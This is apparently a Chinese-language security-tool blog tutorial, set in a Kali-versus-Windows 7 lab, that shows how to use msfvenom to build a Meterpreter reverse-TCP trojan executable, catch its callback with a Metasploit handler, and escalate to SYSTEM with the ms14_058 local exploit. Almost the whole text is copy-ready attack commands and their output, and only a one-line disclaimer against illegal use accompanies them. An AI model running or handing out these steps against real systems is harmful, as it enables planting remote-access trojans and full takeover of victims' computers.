沉默不是没有情绪,是感觉没有再说的意义。。。。
---- 网易云热评
环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木马
1、查看Windows下可利用的payloads
msfvenom -l payloads | grep windows | grep tcp
2、选择windows/meterpreter/reverse_tcp并生成木马
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe
3、/root目录下会生成一个aiyou.exe文件
二、通过Metasploit监听小受
1、启动Metasploit,use exploit/multi/handler
2、设置payload,set payload windows/meterpreter/reverse_tcp
3、设置监听,set lhost 192.168.1.133
4、设置监听端口,set lport 4444
5、run
6、将生成的aiyou.exe拷贝到小受中并运行,getuid查看权限,普通用户
三、提权漏洞(ms14_058)
1、选择提权漏洞:use exploit/windows/local/ms14_058_track_popup_menu
2、查看需要设置的参数:show options
3、设置session值:set session 1,执行run
4、重新生成一个session,查看权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
禁止非法,后果自负
欢迎关注公众号:web安全工具库